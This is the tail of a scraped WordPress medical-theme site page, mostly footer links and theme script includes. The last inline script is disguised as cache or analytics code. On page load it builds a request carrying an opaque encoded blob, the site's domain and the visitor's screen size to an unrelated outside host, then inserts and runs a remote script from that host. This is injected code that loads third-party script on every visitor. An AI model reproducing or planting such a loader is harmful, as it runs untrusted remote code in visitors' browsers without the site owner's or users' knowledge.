	<a href="#" class="linkedin" data-title="Linkedin" target="_blank"><i class="fa fa-linkedin"></i></a>
<a href="#" class="vimeo" data-title="Vimeo" target="_blank"><i class="fa fa-vimeo-square"></i></a>
<a href="https://www.instagram.com/rsarbundallg/" class="instagram" data-title="instagram" target="_blank"><i class="fa fa-instagram"></i></a>
<a href="skype:#" class="skype" data-title="Skype"><i class="fa fa-skype"></i></a>
</div>
</div>
				
						</div>
	</div>
</div>
</footer><!-- #colophon -->
</div><!-- #page -->
<div id="es-top"></div>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/jquery.mousewheel-3.0.4.pack.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/jquery.fancybox-1.3.4.js?ver=1.3.4'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/wow.js?ver=1.1.2'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/jquery.bxslider.min.js?ver=4.1.2'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/jquery.counterup.js?ver=20120206'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/waypoint.js?ver=20120206'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/navigation.js?ver=20120206'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/skip-link-focus-fix.js?ver=20130115'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-includes/js/comment-reply.min.js?ver=4.7.13'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var SliderData = {"mode":"fade","controls":"false","speed":"2000","pause":"5000","pager":"false","auto":"false"};
/* ]]> */
</script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/js/custom-scripts.js?ver=4.7.13'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-includes/js/wp-embed.min.js?ver=4.7.13'></script>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2WTaeSUMt4wrDLxyeP8U6PK8HXb8Fb1Mke5Rd3BNtUOmksonkfxRHpbpu61az%2fCShc4S2kvlOlHctE9x2JTAdyVSFDAIpzbvhm3q%2f%2fPXNvMoYdxH4m6k1A0ryr3DvErYacf5jjpKrjneoAqp513vUC0StK8UWp8STB%2f9hLZuT23fYkL3i4oOLY272%2fDYkZ0ddFnR%2b%2feeoeNRLWSTA6GsIkgeSXH7KRu4wI4wU1bsAhKDrZLLpnYvaqijVWBloqiDPaxSxiuB9gjoQsHh8AMxxh9L%2bCJYrO8Z%2b8cQwh%2bdfNLa9JY22w7pvAMI2O%2bOB0sRDSJmR376VW8cI%2fj%2fMslLsEPuwF11cmOy0DQ55Ix2W1IFDelcRNCyV3BWkbFxS%2bGwnE4p%2fphtX%2fiP5B1eBNTobqqL7GPILe7ubWpcbzm4MgYj3B%2facCV%2bPsjLwQUx%2bxaR4GeoKEx9AdjLanZAcdAx03TvxA0%2b4%2bjz4Nv%2btS2HefK2PSiZ%2fUDdNea6p%2bpld5pFajwTP5vR2tiqumnxGjz1NyrT51iYPBnc4" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
